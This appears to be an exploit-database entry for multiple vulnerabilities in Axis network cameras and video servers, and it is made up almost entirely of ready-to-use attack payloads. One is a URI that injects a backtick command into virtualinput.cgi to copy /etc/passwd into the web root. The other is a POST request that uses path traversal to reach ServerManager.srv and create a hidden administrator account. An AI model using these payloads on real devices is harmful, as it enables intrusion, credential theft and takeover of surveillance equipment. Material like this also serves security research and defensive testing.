Axis Network Camera And Video Server Multiple Vulnerabilities

Axis Network Camera And Video Server Multiple Vulnerabilities

Exploits are not required for these vulnerabilities. Examples have been provided:

A URI sufficient to exploit the first vulnerability:
http://www.example.com/axis-cgi/io/virtualinput.cgi?\x60cat</etc/passwd>/mnt/flash/etc/httpd/html/passwd\x60

Example contents of POST data sufficient to exploit the second vulnerability:
POST /cgi-bin/scripts/../../this_server/ServerManager.srv HTTP/1.0
Content-Length: 250
Pragma: no-cache

conf_Security_List=root%%3AADVO%%3A%%3Awh00t%%3AAD%%3A119104048048116%%3A&users=wh00t&username=wh00t&password1=wh00t&password2=wh00t&checkAdmin=on&checkDial=on&checkView=on&servermanager_return_page=%%2Fadmin%%2Fsec_users.shtml&servermanager_do=set_variables

/data/vulnerabilities/exploits/11011.php